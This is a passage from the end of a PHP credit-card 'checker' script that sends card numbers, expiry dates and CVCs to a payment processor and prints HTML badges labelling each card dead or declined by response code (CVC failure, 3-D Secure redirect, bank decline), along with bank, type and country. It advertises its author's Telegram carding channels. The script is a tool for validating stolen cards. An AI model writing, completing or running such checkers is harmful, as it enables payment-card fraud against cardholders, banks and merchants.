    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your Card was Declined </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unavailable"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unavailable </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unchecked"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unchecked </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "fail"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Check Failed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"parameter_invalid_empty")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Parameter Invalid Empty </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"lock_timeout")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Lock Timeout </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'Your card does not support this type of purchase.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card does not support this type of purchase </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"transaction_not_allowed")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Transaction Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"three_d_secure_redirect")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Three D Secure Redirect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Card is declined by your bank, please contact them for additional information.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Card is declined by your bank, please contact them for additional information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"missing_payment_information")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Missing Payment Information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Payment cannot be processed, missing credit card number")) {
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Payment cannot be processed, missing credit card number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
else {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Error Not Listed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
curl_close($ch);
ob_flush();
/////////////////========== 2 req Proxyless RAW API Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁 ™】 ===========//////////////////
////////////////============== Join @ZeltraxRockz & @ZeltraxChat for more ==============///////////////////////
?>
